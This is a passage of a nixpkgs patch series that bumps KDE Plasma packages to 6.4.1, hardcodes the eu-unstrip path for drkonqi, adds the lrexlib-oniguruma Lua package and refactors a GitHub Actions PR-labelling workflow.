"sha256-Wz1d8nOQ7ggmCWSypo1Zl/L1B9F1MRRg+6Gs6kFNyFI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/oxygen-sounds-6.4.1.tar.xz", + "hash": "sha256-pv3YCBYyLq0GRdiJUQpUAh/UvYGEiBTfh1SM8m4HaD8=" }, "plasma-activities": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-activities-6.4.0.tar.xz", - "hash": "sha256-Go8DS7iVx1d5jFvoeiDbVGlvRe7ePXG4uBXPZmz864w=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-activities-6.4.1.tar.xz", + "hash": "sha256-DsBpK13LBfyC0ef3KFq4LaImndt9Axi49KYQONpE2WM=" }, "plasma-activities-stats": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-activities-stats-6.4.0.tar.xz", - "hash": "sha256-kxNliQbYG/KW2emKwZeQuD6Ii6ifESPGKwpy+TjyjuY=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-activities-stats-6.4.1.tar.xz", + "hash": "sha256-rfX0v6dY/0EwmXjvULv1/wpZbq+RNzhtS4cOe8wjMLc=" }, "plasma-browser-integration": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-browser-integration-6.4.0.tar.xz", - "hash": "sha256-FH4LixBeR8o/xpTdLYbsvqp8PDFdi/PaDUtuNagp56Q=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-browser-integration-6.4.1.tar.xz", + "hash": "sha256-eqDYwMci6fdjuu9cFTp/iC9JDbz5lWPQRye3WcXC1jQ=" }, "plasma-desktop": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-desktop-6.4.0.tar.xz", - "hash": "sha256-GOEUAzwYLSY8k39bxBeTJSkx3NrCKwTUnTOgEJuyrrI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-desktop-6.4.1.tar.xz", + "hash": "sha256-tc979WDIpK/1oSGc+kF6h2uYIHGju4AdKv9T2/GKBYQ=" }, "plasma-dialer": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-dialer-6.4.0.tar.xz", - "hash": "sha256-pyPbCGLDWhw48Fn8zs8rUECrOiv/+gHPY7fh+yUh45A=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-dialer-6.4.1.tar.xz", + "hash": "sha256-8bIXU1QRiWxHwQ4cc99Zsp9mQwU8cdfuHWXqLiUr0Q4=" }, "plasma-disks": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-disks-6.4.0.tar.xz", - "hash": "sha256-lMle0b1JREjIHjU2Dci0muBazsExZR7IFxb0pSIY6pA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-disks-6.4.1.tar.xz", + "hash": "sha256-yY+aDVMimCqQhJfXzAKGeCVIYle44lRi0ZfzNgEcUxQ=" }, "plasma-firewall": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-firewall-6.4.0.tar.xz", - "hash": "sha256-8MCE2Yxff3Kjc1X9vN/nwv8CBe0kAJAUQGqSRNZIRoU=" + "version": "6.4.1", + "url": 
"mirror://kde/stable/plasma/6.4.1/plasma-firewall-6.4.1.tar.xz", + "hash": "sha256-ctXVNJPuOQGEf+Y8+XamjX9gGwh40spnBOhkoFwPv5w=" }, "plasma-integration": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-integration-6.4.0.tar.xz", - "hash": "sha256-pxhoIFKN72+Ie2Qu+nv7TE4UjRTmXvCreH/DWmLigdA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-integration-6.4.1.tar.xz", + "hash": "sha256-EoE9sNZoVVBXAammIi5qUTpVV4kDJfEMofy/eH2R7eM=" }, "plasma-mobile": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-mobile-6.4.0.tar.xz", - "hash": "sha256-1m4fkOvV+ZPueDW3+K6suq0VtB5W3wqyq65Ve0Ck2Dg=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-mobile-6.4.1.tar.xz", + "hash": "sha256-+1ivtVRjh7bYN7rGEyNXTgywKBvKob3gH0KKzsWZ8xY=" }, "plasma-nano": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-nano-6.4.0.tar.xz", - "hash": "sha256-gF400TsjLpf5D3pU/DnLx5qU2ZZ83e3t4GAgKD4+n/E=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-nano-6.4.1.tar.xz", + "hash": "sha256-dg9AAdpOMJqWH27gpbl+df+cyzLwQgcLNAz/cHhbMRM=" }, "plasma-nm": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-nm-6.4.0.tar.xz", - "hash": "sha256-JZC7gTpX7UEdNwfrrUuo4tvE7V2DC/I1R/loYpcV1Tc=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-nm-6.4.1.tar.xz", + "hash": "sha256-UdwzjlHWBuEx9OM9T7e7KOrYpJzWikYiUtySClkRHFA=" }, "plasma-pa": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-pa-6.4.0.tar.xz", - "hash": "sha256-exm0FHhwiDWhWASU5VIYA7ybeUdLUO0ev5MYog4e0ag=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-pa-6.4.1.tar.xz", + "hash": "sha256-C3lyY/Ug3n1zgbcFsW1e/Ul2ZMTzdhoty6k8axxKttE=" }, "plasma-sdk": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-sdk-6.4.0.tar.xz", - "hash": "sha256-s/ExaxY7tearhpcDBuZjdgrpOBSkPtQ/Ky92ESisKIU=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-sdk-6.4.1.tar.xz", + "hash": "sha256-c6hlAmveq0XI9ItQrGVvDmJrsEE+dkfAFtkGi8sPVEY=" }, "plasma-systemmonitor": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-systemmonitor-6.4.0.tar.xz", - "hash": "sha256-lDac1svv9f+vNgXudmDqSqoD2VkoKw8g1lmpU64tl1o=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-systemmonitor-6.4.1.tar.xz", + "hash": "sha256-sYENMpuBrDWvynX1/yiHtyTi/HsfnFEBmLh8KcuL3l8=" }, "plasma-thunderbolt": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-thunderbolt-6.4.0.tar.xz", - "hash": "sha256-w92KudTZFGkp87OWftV/ZpXQpW+Q8oGWTRzwTa9uXI4=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-thunderbolt-6.4.1.tar.xz", + "hash": "sha256-FSxKrKBrV5HBGyBdehA+gGHcX/qt/3T0/Q8Zhc/Jzj0=" }, "plasma-vault": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-vault-6.4.0.tar.xz", - "hash": "sha256-zdDtq+GiFchWaMRzSfOsju2VpGG71WTWfsjfIXDq52w=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-vault-6.4.1.tar.xz", + "hash": "sha256-ayOumkp28MaGltQ0awdjtD5STWBceFcNsy/RC4Znp2w=" }, "plasma-welcome": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-welcome-6.4.0.tar.xz", - "hash": "sha256-Lw08NImQOoZYa4Otb7UrwVLhtFnkq+yC/wIrUbjStDY=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-welcome-6.4.1.tar.xz", + "hash": "sha256-BpW/epqDX01kBq2bdjycyWwH14GVlMT1CIfrcnfnToA=" }, "plasma-workspace": { - 
"version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-workspace-6.4.0.tar.xz", - "hash": "sha256-lh71T3/SHyEvjWMzAPG7BSBSSql5TkM64avhasBWCys=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-workspace-6.4.1.tar.xz", + "hash": "sha256-IGe1OeV0Rbs1/DtYmk9feu4xVJkG4iDojYeQ168yruQ=" }, "plasma-workspace-wallpapers": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-workspace-wallpapers-6.4.0.tar.xz", - "hash": "sha256-zEs1PLI63zJos4sVxvb70lpjd0tJgkaPgORQ9gDTkwI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-workspace-wallpapers-6.4.1.tar.xz", + "hash": "sha256-ckXn4lj1YoL+IUJZ+ughSV78ArO5GqnWo58r7Z9eYdc=" }, "plasma5support": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma5support-6.4.0.tar.xz", - "hash": "sha256-OuNktBqGjQ/ZlHxTs9iHI5OLsIA/H4Yphfkztslz6EM=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma5support-6.4.1.tar.xz", + "hash": "sha256-EXo7m806Y96DcZ2U85o0zM9kOnFDXISlxQWwRERrjas=" }, "plymouth-kcm": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plymouth-kcm-6.4.0.tar.xz", - "hash": "sha256-WW0OK4QQbLkS1Poo38mmLPppMAEPJ7aPw0ph2TQSWVM=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plymouth-kcm-6.4.1.tar.xz", + "hash": "sha256-KL2d+x5qiAoCsJ3ylJLBbF+7KAU6oqe3wTao4+cGxF0=" }, "polkit-kde-agent-1": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/polkit-kde-agent-1-6.4.0.tar.xz", - "hash": "sha256-qKtd9qseoF5j7wjrvlNuE5PU9tbdSylzBWGfweh1FcU=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/polkit-kde-agent-1-6.4.1.tar.xz", + "hash": "sha256-uxzAN3JTaDNEOdE9x94SxfUXs5g4XxyfUpVxpTkqkwI=" }, "powerdevil": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/powerdevil-6.4.0.tar.xz", - "hash": "sha256-0K1Uy21MzznA1bfwx98vUbyZ/9P9bKdTjtP0HfxPZ34=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/powerdevil-6.4.1.tar.xz", + "hash": "sha256-k+Q4HyU/npYHh/61/LhuoafA4peOOzAJrhkqhq5zRi8=" }, "print-manager": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/print-manager-6.4.0.tar.xz", - "hash": "sha256-KrsouJRLPkxIQTyzG1TgeMn6jR/YwRWmFQcxA52Sy/0=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/print-manager-6.4.1.tar.xz", + "hash": "sha256-kJbF8osp9hmb8Kzph2Nh8zZ7efII4FxKWTOdF9S8GfI=" }, "qqc2-breeze-style": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/qqc2-breeze-style-6.4.0.tar.xz", - "hash": "sha256-S+kIS9VZdE2Awgs4k8K7tE3Bk/2TJPTbjSf2rQl++kw=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/qqc2-breeze-style-6.4.1.tar.xz", + "hash": "sha256-YI/1NtUTVx861Kyv1JYOwLWiq/z/MZMhS6wnonR5a+c=" }, "sddm-kcm": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/sddm-kcm-6.4.0.tar.xz", - "hash": "sha256-N4t+twvSPMm7ZUs2a4X7YVgkdqvECIYRU0vDyJGPa/I=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/sddm-kcm-6.4.1.tar.xz", + "hash": "sha256-otENV7QyyCJ83OGTrbuVAAaaKrHY1kYsahgZknXLnsY=" }, "spacebar": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/spacebar-6.4.0.tar.xz", - "hash": "sha256-LHSJ/AczyJjSTexA0fuOUHFAMcJkFPaCYma9PJnAFYA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/spacebar-6.4.1.tar.xz", + "hash": "sha256-X/eec6cvsOSdE+PTQwPTRcqzP6T/IkdQWErePFJE/4k=" }, "spectacle": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/spectacle-6.4.0.tar.xz", - "hash": 
"sha256-cxdWeX6+/p9evbYymwz0zdX2wWmq8WpYwpQF/5emprA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/spectacle-6.4.1.tar.xz", + "hash": "sha256-VHuMxlFzCRYQSosTE1BIFOyn/mpavOJUwQs3/6GxPjQ=" }, "systemsettings": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/systemsettings-6.4.0.tar.xz", - "hash": "sha256-TDhVGapA6Q3LCxoLBw0zE/2e1fszyWPqVFnOXTFpLz8=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/systemsettings-6.4.1.tar.xz", + "hash": "sha256-on8xKikqxMXD76GvcecMqDTX7I6PN6cQz4WuLXu+/5U=" }, "wacomtablet": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/wacomtablet-6.4.0.tar.xz", - "hash": "sha256-c3FmxmiOSOIdTaNp3C83yG/kjx6rv4ndjPJ4WeGiltk=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/wacomtablet-6.4.1.tar.xz", + "hash": "sha256-9n38GT270K5Rxt8IWb6HpNXtae4oO64HzpG0JF++4NE=" }, "xdg-desktop-portal-kde": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/xdg-desktop-portal-kde-6.4.0.tar.xz", - "hash": "sha256-ANt7FVEUaw2pEHi/VAyir1bJ0g+fJUaeJYOdCUVams4=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/xdg-desktop-portal-kde-6.4.1.tar.xz", + "hash": "sha256-HwHWKfaBjkiqas+D9YwH8N3z4b8qHstEgDr2XN4RlYM=" } } \ No newline at end of file From 902aeaeb8529c5475b21db5a98972d07456c1270 Mon Sep 17 00:00:00 2001 From: K900 Date: Tue, 24 Jun 2025 15:19:10 +0300 Subject: [PATCH 39/73] kdePackages.drkonqi: provide eu-unstrip --- pkgs/kde/plasma/drkonqi/default.nix | 4 +++- .../{gdb-path.patch => hardcode-paths.patch} | 15 ++++++++++++++- 2 files changed, 17 insertions(+), 2 deletions(-) rename pkgs/kde/plasma/drkonqi/{gdb-path.patch => hardcode-paths.patch} (77%) diff --git a/pkgs/kde/plasma/drkonqi/default.nix b/pkgs/kde/plasma/drkonqi/default.nix index 965ba59b308d..9ae29a108057 100644 --- a/pkgs/kde/plasma/drkonqi/default.nix +++ b/pkgs/kde/plasma/drkonqi/default.nix @@ -2,6 +2,7 @@ mkKdeDerivation, pkg-config, systemd, + elfutils, gdb, python3, replaceVars, @@ -20,8 +21,9 @@ mkKdeDerivation { pname = "drkonqi"; patches = [ - (replaceVars ./gdb-path.patch { + (replaceVars ./hardcode-paths.patch { gdb = "${gdb'}/bin/gdb"; + eu-unstrip = "${elfutils}/bin/eu-unstrip"; }) ]; diff --git a/pkgs/kde/plasma/drkonqi/gdb-path.patch b/pkgs/kde/plasma/drkonqi/hardcode-paths.patch similarity index 77% rename from pkgs/kde/plasma/drkonqi/gdb-path.patch rename to pkgs/kde/plasma/drkonqi/hardcode-paths.patch index 620a0c9ce9d1..f428524b12b1 100644 --- a/pkgs/kde/plasma/drkonqi/gdb-path.patch +++ b/pkgs/kde/plasma/drkonqi/hardcode-paths.patch @@ -1,5 +1,18 @@ +diff --git a/src/data/gdb_preamble/preamble.py b/src/data/gdb_preamble/preamble.py +index 4855231b5..a488025c1 100644 +--- a/src/data/gdb_preamble/preamble.py ++++ b/src/data/gdb_preamble/preamble.py +@@ -773,7 +773,7 @@ def resolve_modules(): + # core doesn't contain one. That makes the ids a bit unreliable but still better than nothing I suppose. + # Ultimately we'll want to use gdb here. 
+ # https://sourceware.org/bugzilla/show_bug.cgi?id=32844 +- output = get_stdout(['eu-unstrip', "--list-only", f"--core={corefile}"], env=env) ++ output = get_stdout(['@eu-unstrip@', "--list-only", f"--core={corefile}"], env=env) + for line in output.splitlines(): + image = CoreImage(line) + if image.valid: diff --git a/src/debugger.cpp b/src/debugger.cpp -index 946bdd12..5c24b371 100644 +index 946bdd12e..5c24b3713 100644 --- a/src/debugger.cpp +++ b/src/debugger.cpp @@ -36,12 +36,12 @@ QList Debugger::availableInternalDebuggers(const QString &backend) From a5539704d765b6ff487839cbc10728d139074a20 Mon Sep 17 00:00:00 2001 From: June Stepp Date: Sat, 21 Jun 2025 17:53:21 -0500 Subject: [PATCH 40/73] luaPackages.lrexlib-oniguruma: init at 2.9.2-1 --- maintainers/scripts/luarocks-packages.csv | 1 + .../lua-modules/generated-packages.nix | 33 +++++++++++++++++++ pkgs/development/lua-modules/overrides.nix | 10 ++++++ 3 files changed, 44 insertions(+) diff --git a/maintainers/scripts/luarocks-packages.csv b/maintainers/scripts/luarocks-packages.csv index 457505f8f0de..817e95c48407 100644 --- a/maintainers/scripts/luarocks-packages.csv +++ b/maintainers/scripts/luarocks-packages.csv @@ -45,6 +45,7 @@ lpeg,,,,,,vyp lpeg_patterns,,,,,, lpeglabel,,,,1.6.0,, lrexlib-gnu,,,,,, +lrexlib-oniguruma,,,,,,junestepp lrexlib-pcre,,,,,,vyp lrexlib-posix,,,,,, lsp-progress.nvim,,,,,,gepbird diff --git a/pkgs/development/lua-modules/generated-packages.nix b/pkgs/development/lua-modules/generated-packages.nix index 290b5a9a6636..49248b3f7c1b 100644 --- a/pkgs/development/lua-modules/generated-packages.nix +++ b/pkgs/development/lua-modules/generated-packages.nix @@ -1511,6 +1511,39 @@ final: prev: { } ) { }; + lrexlib-oniguruma = callPackage ( + { + buildLuarocksPackage, + fetchFromGitHub, + fetchurl, + luaOlder, + }: + buildLuarocksPackage { + pname = "lrexlib-oniguruma"; + version = "2.9.2-1"; + knownRockspec = + (fetchurl { + url = "mirror://luarocks/lrexlib-oniguruma-2.9.2-1.rockspec"; + sha256 = "13m2v6mmmlkf2bd1mnngg118s4ymrqs7n34la6hrb4m1x772adhd"; + }).outPath; + src = fetchFromGitHub { + owner = "rrthomas"; + repo = "lrexlib"; + rev = "rel-2-9-2"; + hash = "sha256-DzNDve+xeKb+kAcW+o7GK/RsoDhaDAVAWAhgjISCyZc="; + }; + + disabled = luaOlder "5.1"; + + meta = { + homepage = "https://github.com/rrthomas/lrexlib"; + description = "Regular expression library binding (oniguruma flavour)."; + maintainers = with lib.maintainers; [ junestepp ]; + license.fullName = "MIT/X11"; + }; + } + ) { }; + lrexlib-pcre = callPackage ( { buildLuarocksPackage, diff --git a/pkgs/development/lua-modules/overrides.nix b/pkgs/development/lua-modules/overrides.nix index 2a9860397131..db8acad7a77f 100644 --- a/pkgs/development/lua-modules/overrides.nix +++ b/pkgs/development/lua-modules/overrides.nix @@ -39,6 +39,7 @@ mariadb, mpfr, neovim-unwrapped, + oniguruma, openldap, openssl, pcre, @@ -379,6 +380,15 @@ in ]; }); + lrexlib-oniguruma = prev.lrexlib-oniguruma.overrideAttrs (oa: { + externalDeps = [ + { + name = "ONIG"; + dep = oniguruma; + } + ]; + }); + lrexlib-pcre = prev.lrexlib-pcre.overrideAttrs (oa: { externalDeps = [ { From 042a2fd6d6834366b142c74e518fd2674de69725 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Sun, 22 Jun 2025 14:50:28 +0200 Subject: [PATCH 41/73] workflows/labels: refactor into handle() function Separate commit for better diff. 
--- .github/workflows/labels.yml | 254 ++++++++++++++++++----------------- 1 file changed, 128 insertions(+), 126 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 83cf0511fc5e..aacaa311a0c9 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -165,6 +165,133 @@ jobs: base: context.payload.pull_request.base.ref } + async function handle(pull_request, done) { + try { + const log = (k,v,skip) => { + core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) + return skip + } + + if (log('Last updated at', pull_request.updated_at, new Date(pull_request.updated_at) < cutoff)) + return done() + stats.prs++ + log('URL', pull_request.html_url) + + const run_id = (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'pr.yml', + event: 'pull_request_target', + // For PR events, the workflow run is still in progress with this job itself. + status: prEventCondition ? 'in_progress' : 'success', + exclude_pull_requests: true, + head_sha: pull_request.head.sha + })).data.workflow_runs[0]?.id ?? + // TODO: Remove this after 2025-09-17, at which point all eval.yml artifacts will have expired. + (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + // In older PRs, we need eval.yml instead of pr.yml. + workflow_id: 'eval.yml', + event: 'pull_request_target', + status: 'success', + exclude_pull_requests: true, + head_sha: pull_request.head.sha + })).data.workflow_runs[0]?.id + + // Newer PRs might not have run Eval to completion, yet. We can skip them, because this + // job will be run as part of that Eval run anyway. + if (log('Last eval run', run_id ?? '', !run_id)) + return; + + const artifact = (await github.rest.actions.listWorkflowRunArtifacts({ + ...context.repo, + run_id, + name: 'comparison' + })).data.artifacts[0] + + // Instead of checking the boolean artifact.expired, we will give us a minute to + // actually download the artifact in the next step and avoid that race condition. + // Older PRs, where the workflow run was already eval.yml, but the artifact was not + // called "comparison", yet, will be skipped as well. + const expired = new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) + if (log('Artifact expires at', artifact?.expires_at ?? '', expired)) + return; + stats.artifacts++ + + await artifactClient.downloadArtifact(artifact.id, { + findBy: { + repositoryName: context.repo.repo, + repositoryOwner: context.repo.owner, + token: core.getInput('github-token') + }, + path: path.resolve(pull_request.number.toString()), + expectedHash: artifact.digest + }) + + // Create a map (Label -> Boolean) of all currently set labels. + // Each label is set to True and can be disabled later. 
+ const before = Object.fromEntries( + (await github.paginate(github.rest.issues.listLabelsOnIssue, { + ...context.repo, + issue_number: pull_request.number + })) + .map(({ name }) => [name, true]) + ) + + const approvals = new Set( + (await github.paginate(github.rest.pulls.listReviews, { + ...context.repo, + pull_number: pull_request.number + })) + .filter(review => review.state == 'APPROVED') + .map(review => review.user?.id) + ) + + const maintainers = new Set(Object.keys( + JSON.parse(await readFile(`${pull_request.number}/maintainers.json`, 'utf-8')) + ).map(m => Number.parseInt(m, 10))) + + const evalLabels = JSON.parse(await readFile(`${pull_request.number}/changed-paths.json`, 'utf-8')).labels + + // Manage the labels + const after = Object.assign( + {}, + before, + // Ignore `evalLabels` if it's an array. + // This can happen for older eval runs, before we switched to objects. + // The old eval labels would have been set by the eval run, + // so now they'll be present in `before`. + // TODO: Simplify once old eval results have expired (~2025-10) + (Array.isArray(evalLabels) ? undefined : evalLabels), + { + '12.approvals: 1': approvals.size == 1, + '12.approvals: 2': approvals.size == 2, + '12.approvals: 3+': approvals.size >= 3, + '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), + '12.first-time contribution': + [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), + } + ) + + // No need for an API request, if all labels are the same. + const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) + if (log('Has changes', hasChanges, !hasChanges)) + return; + + // Skipping labeling on a pull_request event, because we have no privileges. + const labels = Object.entries(after).filter(([,value]) => value).map(([name]) => name) + if (log('Set labels', labels, context.eventName == 'pull_request')) + return; + + await github.rest.issues.setLabels({ + ...context.repo, + issue_number: pull_request.number, + labels + }) + } catch (cause) { + throw new Error(`Labeling PR #${pull_request.number} failed.`, { cause }) + } + } + const prs = await github.paginate( github.rest.pulls.list, { @@ -174,132 +301,7 @@ jobs: direction: 'desc', ...prEventCondition }, - (response, done) => response.data.map(async (pull_request) => { - try { - const log = (k,v,skip) => { - core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) - return skip - } - - if (log('Last updated at', pull_request.updated_at, new Date(pull_request.updated_at) < cutoff)) - return done() - stats.prs++ - log('URL', pull_request.html_url) - - const run_id = (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'pr.yml', - event: 'pull_request_target', - // For PR events, the workflow run is still in progress with this job itself. - status: prEventCondition ? 'in_progress' : 'success', - exclude_pull_requests: true, - head_sha: pull_request.head.sha - })).data.workflow_runs[0]?.id ?? - // TODO: Remove this after 2025-09-17, at which point all eval.yml artifacts will have expired. - (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - // In older PRs, we need eval.yml instead of pr.yml. - workflow_id: 'eval.yml', - event: 'pull_request_target', - status: 'success', - exclude_pull_requests: true, - head_sha: pull_request.head.sha - })).data.workflow_runs[0]?.id - - // Newer PRs might not have run Eval to completion, yet. 
We can skip them, because this - // job will be run as part of that Eval run anyway. - if (log('Last eval run', run_id ?? '', !run_id)) - return; - - const artifact = (await github.rest.actions.listWorkflowRunArtifacts({ - ...context.repo, - run_id, - name: 'comparison' - })).data.artifacts[0] - - // Instead of checking the boolean artifact.expired, we will give us a minute to - // actually download the artifact in the next step and avoid that race condition. - // Older PRs, where the workflow run was already eval.yml, but the artifact was not - // called "comparison", yet, will be skipped as well. - const expired = new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) - if (log('Artifact expires at', artifact?.expires_at ?? '', expired)) - return; - stats.artifacts++ - - await artifactClient.downloadArtifact(artifact.id, { - findBy: { - repositoryName: context.repo.repo, - repositoryOwner: context.repo.owner, - token: core.getInput('github-token') - }, - path: path.resolve(pull_request.number.toString()), - expectedHash: artifact.digest - }) - - // Create a map (Label -> Boolean) of all currently set labels. - // Each label is set to True and can be disabled later. - const before = Object.fromEntries( - (await github.paginate(github.rest.issues.listLabelsOnIssue, { - ...context.repo, - issue_number: pull_request.number - })) - .map(({ name }) => [name, true]) - ) - - const approvals = new Set( - (await github.paginate(github.rest.pulls.listReviews, { - ...context.repo, - pull_number: pull_request.number - })) - .filter(review => review.state == 'APPROVED') - .map(review => review.user?.id) - ) - - const maintainers = new Set(Object.keys( - JSON.parse(await readFile(`${pull_request.number}/maintainers.json`, 'utf-8')) - ).map(m => Number.parseInt(m, 10))) - - const evalLabels = JSON.parse(await readFile(`${pull_request.number}/changed-paths.json`, 'utf-8')).labels - - // Manage the labels - const after = Object.assign( - {}, - before, - // Ignore `evalLabels` if it's an array. - // This can happen for older eval runs, before we switched to objects. - // The old eval labels would have been set by the eval run, - // so now they'll be present in `before`. - // TODO: Simplify once old eval results have expired (~2025-10) - (Array.isArray(evalLabels) ? undefined : evalLabels), - { - '12.approvals: 1': approvals.size == 1, - '12.approvals: 2': approvals.size == 2, - '12.approvals: 3+': approvals.size >= 3, - '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), - '12.first-time contribution': - [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), - } - ) - - // No need for an API request, if all labels are the same. - const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) - if (log('Has changes', hasChanges, !hasChanges)) - return; - - // Skipping labeling on a pull_request event, because we have no privileges. 
- const labels = Object.entries(after).filter(([,value]) => value).map(([name]) => name) - if (log('Set labels', labels, context.eventName == 'pull_request')) - return; - - await github.rest.issues.setLabels({ - ...context.repo, - issue_number: pull_request.number, - labels - }) - } catch (cause) { - throw new Error(`Labeling PR #${pull_request.number} failed.`, { cause }) - } - }) + (response, done) => response.data.map(pull_request => handle(pull_request, done)) ); (await Promise.allSettled(prs.flat())) From f394b2741ed5fe11e79fc926a7547ec174e219e2 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Sun, 22 Jun 2025 16:30:00 +0200 Subject: [PATCH 42/73] workflows/labels: refactor moving cutoff downwards --- .github/workflows/labels.yml | 52 ++++++++++++++++++------------------ 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index aacaa311a0c9..0cace4e0217b 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -131,30 +131,6 @@ jobs: if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) throw new Error('Please enter "updated within" as integer in hours.') - const cutoff = new Date(await (async () => { - // Always run for Pull Request triggers, no cutoff since there will be a single - // response only anyway. 0 is the Unix epoch, so always smaller. - if (context.payload.pull_request?.number) return 0 - - // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last - // option if the updatedWithin parameter is set to 0, which is the default. - const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) - if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 - - // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far - // as the last successful run of this workflow to make sure we are not leaving anyone - // behind on GHA failures. - // Defaults to go back 1 hour on the first run. - return (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'labels.yml', - event: 'schedule', - status: 'success', - exclude_pull_requests: true - })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 - })()) - core.info('cutoff timestamp: ' + cutoff.toISOString()) - // To simplify this action's 